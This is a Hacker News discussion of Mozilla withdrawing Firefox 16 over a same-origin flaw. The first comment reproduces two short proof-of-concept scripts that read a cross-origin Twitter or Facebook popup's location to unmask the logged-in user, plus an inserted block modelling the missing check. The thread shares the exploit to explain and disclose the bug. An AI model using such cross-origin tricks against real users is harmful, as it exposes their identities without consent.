

Mozilla pulls day-old Firefox 16 from download site over security risk - molecule
http://arstechnica.com/security/2012/10/mozilla-pulls-day-old-firefox-16-from-download-site-over-security-risk/

======
pittsburgh
If you're curious like I was, you can find the details of the vulnerability
described by Gareth Heyes at
[http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-yo...](http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-your-friends-did-last-summer/)

His proof-of-concept of the vulnerability can be found at
[http://www.businessinfo.co.uk/labs/firefox_knows_what_your_f...](http://www.businessinfo.co.uk/labs/firefox_knows_what_your_friends_did_last_summer/poc.html)
(Best fetched via curl... or Firefox 16.0 with an active Twitter session if
you're daring.)

Or you can just see the source here:

    <!doctype html>
    <script>
    function poc() {
      // Open a Twitter URL that, for a logged-in user, redirects to a URL
      // whose first path segment is that user's name.
      var win = window.open('https://twitter.com/lists/',
        'newWin', 'width=200,height=200');
      // After the redirect, read the cross-origin popup's location. The
      // same-origin policy should block this read; Firefox 16.0 allowed it.
      setTimeout(function(){
        alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
      }, 5000);
    }
    </script>
    <input type=button value="Firefox knows" onclick="poc()">

edit: As others discovered, the regex stuff is an unnecessary red herring.
Here's a simplified POC that uses Facebook to discover your vanity URL:

    <!doctype html>
    <script>
    function poc() {
      // profile.php redirects to the logged-in user's vanity URL.
      var win = window.open('https://facebook.com/profile.php',
        'newWin', 'width=200,height=200');
      // Same cross-origin location read as above, without the regex.
      setTimeout(function(){
        alert('Hello ' + win.location);
      }, 5000);
    }
    </script>
    <input type=button value="Firefox knows" onclick="poc()">
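
The check that Firefox 16.0 skipped, as an added example that is not from the article, this comment, or Gareth Heyes' PoC: a small plain-JavaScript model of the same-origin test a browser must apply before one window may read another window's Location. The twitter.com URLs follow the PoC; the opener origin, the redirected username, and the helper names (`parseOrigin`, `makeWindow`, `probe`) are constructed for the demo.

```javascript
// Added example: a model of the same-origin check on window.location that
// Firefox 16.0 failed to apply. Not from the article or the PoC above.

// Reduce a URL to its origin, "scheme://host:port", filling in default ports
// so that https://twitter.com and https://twitter.com:443/x compare equal.
function parseOrigin(url) {
  var m = /^([a-z][a-z0-9+.-]*):\/\/([^/:?#]+)(?::(\d+))?/i.exec(url);
  if (!m) throw new Error('unsupported URL: ' + url);
  var scheme = m[1].toLowerCase();
  var host = m[2].toLowerCase();
  var defaults = { http: '80', https: '443' };
  var port = m[3] || defaults[scheme] || '';
  return scheme + '://' + host + ':' + port;
}

function sameOrigin(a, b) {
  return parseOrigin(a) === parseOrigin(b);
}

// A stand-in for a popup window whose URL changes after a server redirect.
// A document on another origin may navigate the popup but must not read
// where it ended up; a compliant browser throws a SecurityError instead.
function makeWindow(initialUrl) {
  var current = initialUrl;
  return {
    navigate: function (url) { current = url; },
    readLocation: function (readerUrl) {
      if (!sameOrigin(readerUrl, current)) {
        var err = new Error('Permission denied to access property "href"');
        err.name = 'SecurityError';
        throw err;
      }
      return current;
    }
  };
}

// Re-enacts the PoC flow: a page on openerUrl opens https://twitter.com/lists/,
// which redirects to a URL that names the logged-in user. With the check in
// place the read fails and nothing about the user leaks to the opener.
function probe(openerUrl) {
  var win = makeWindow('https://twitter.com/lists/');
  win.navigate('https://twitter.com/someuser/lists'); // constructed redirect target
  try {
    return { leaked: true, href: win.readLocation(openerUrl) };
  } catch (e) {
    return { leaked: false, error: e.name };
  }
}
```

In the fixed browser the cross-origin `probe` result is `{ leaked: false, error: 'SecurityError' }`; only a same-origin reader gets the redirected href back.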

~~~
gcp
Given that this bug was likely there for at least 12 weeks in Beta and Aurora
releases, it sort-of makes you question if the release schedule couldn't be
even faster by skipping one of these, or at least trying to encourage _many_ more
people (certainly the ones who can pull off the above) to try Betas. Having 18
weeks of lead-time for a release clearly doesn't do much good when nobody
tries it beforehand.

There were chemspills for Firefox 13, 14, 15 and now 16. None of those seemed
to be caused by the rapid development schedule, they were (IIRC) all issues
discovered because the release had much wider exposure compared to beta.

On the other hand, Firefox now does silent updates, so if there hadn't been so
much publicity about the Firefox release (or on the update being blocked), it
might have been a non-event. In a few hours everyone will be on 16.0.1. I'm
not sure if this would have happened to a non-open-source project, if we'd even
hear about it.

Maybe we can make it clearer that "Beta" is really Mozillian for "Release
Candidate"?

~~~
dfc
Chemspills?

~~~
cpeterso
A "chemspill" is Mozilla-speak for an x.0.1 dot release to fix a critical bug,
such as a security bug or a serious crash.

------
machrider
<sarcasm>Thanks Ubuntu for sending this update so quickly!</sarcasm>

I never really thought of Ubuntu as a bleeding-edge distribution, but it seems
more and more like one lately. It used to be the distro that "just works".
Now, I find myself dealing with more and more bugs as the years go. Debian
stable is probably too conservative for a workstation - is there a happy
medium distro out there?

~~~
sciurus
Ubuntu has decided to closely track Firefox releases because Mozilla doesn't
provide security updates for older Firefox versions. I'm not sure what other
software receives major version updates within the lifetime of an Ubuntu
release (Chromium?), but it's not the norm.

Debian hasn't adopted this policy yet; they still declare a version of Firefox
stable and backport patches to it. They've had to switch the name and logos
from Firefox to Iceweasel because Mozilla does not allow anyone to
independently provide updates and still use the Firefox trademark.

[https://wiki.ubuntu.com/DesktopTeam/Specs/Lucid/FirefoxNewSu...](https://wiki.ubuntu.com/DesktopTeam/Specs/Lucid/FirefoxNewSupportModel)

<http://wiki.debian.org/Iceweasel>

~~~
cookiecaper
Which makes sense. If you change Firefox, it's no longer the real Firefox,
it's a derivative work. Allowing derivative works to use your trademark
without careful review and blessing is surely dangerous and misrepresentative.

~~~
sciurus
This is going off on a tangent, but in comparison to other free software
projects Mozilla is unusually strict about trademarks.

LibreOffice, for instance, has a policy that says you can use their trademark
if you are 'substantially unmodified', which means "built from the source code
provided by TDF, possibly with minor modifications (including but not limited
to: the enabling or disabling of certain features by default, translations
into other languages, changes required for compatibility with a particular
operating system distribution, the inclusion of bug-fix patches, or the
bundling of additional fonts, templates, artwork and extensions)."

Mike Connor from Mozilla has said that to use the Mozilla trademarks, you have
to get prior approval from them for your build configuration and every patch
you introduce.

[http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=74;bug=3546...](http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=74;bug=354622)

~~~
gcp
Does The Document Foundation receive any income from their distribution of
LibreOffice?

------
jaipilot747
Pulling the download links does nothing for users who already installed or
upgraded to FF16, leaving them vulnerable for the one day it takes Mozilla to
fix this, without them even knowing that they are at risk.

~~~
gcp
Firefox releases go through 18 weeks of testing before release, so everyone on
Beta, Aurora or Nightly has been vulnerable for a long time - the exploit
simply wasn't known yet.

------
fluxon
If FF16 was pulled, why did it _just_ (Thu, Oct 11, 12:05pm PST) download and
try to update my 15.0.1? (WinXP) That made me . . . uncomfortable.

------
bookworm_
Firefox is a monster. Too big. I switched to Webkit and midori (but there are
certainly other small, simple WebKit-based alternatives).

So no to Gecko.

~~~
gcp
Yes, because Webkit never had security issues, and those alternate browsers
have faster patching processes than Mozilla or Google do.

I don't think so.

------
jebblue
If Firefox hadn't gone on a version roller coaster ride I'd still be using
it. At least they pull versions that need more attention. But, FF 16!?!?!
16!!!? Huh? My plugins stopped working long ago and I stopped taking Mozilla
seriously long ago, well not long ago, maybe a couple of years ago when I
switched to Chrome. It's weird I thought Google was a financial supporter of
Mozilla?

~~~
ryannielsen
_If Firefox hadn't gone on a version roller coaster ride I'd still be using
it. At least they pull versions that need more attention. But, FF 16!?!?!
16!!!? Huh?_

. . . you do know Chrome's at version 22 and version 24 is in dev release,
right?

Knock FF for the more disruptive update process, and for breaking plugins in
earlier releases, sure. But (AFAIK) the plugin interfaces have been stable for
quite some time now, and Firefox 15 introduced true silent updates. They seem
to have fixed the pain points in their rapid release schedule.

If you use Chrome, however, you _cannot_ knock them for iterating more
quickly; Chrome's in the same boat.

~~~
jebblue
>> If you use Chrome, however, you cannot knock them for iterating more
quickly; Chrome's in the same boat.

My Chrome plugins don't break. They can change the version every day for all I
care just don't break my plugins, extensions.

~~~
timdorr
You know they're going to break old extensions in a year, right?
<http://developer.chrome.com/extensions/manifestVersion.html>

~~~
jebblue
If a developer can't upgrade their extension with that much notice and that
clear a specification, I don't want to use their extension any more if it
breaks.

